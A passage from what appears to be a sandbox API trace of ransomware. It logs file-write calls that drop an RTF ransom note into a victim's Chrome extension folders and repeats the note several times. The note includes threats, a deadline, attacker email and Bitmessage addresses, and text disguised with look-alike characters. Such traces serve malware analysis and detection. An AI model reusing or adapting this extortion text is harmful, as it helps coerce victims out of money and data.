\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.352] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.352] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.352] CloseHandle (hObject=0x2e8) returned 1 [0289.352] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\#readme_eman#.rtf")) returned 0xffffffff [0289.352] GetLastError () returned 0x2 [0289.352] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.355] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 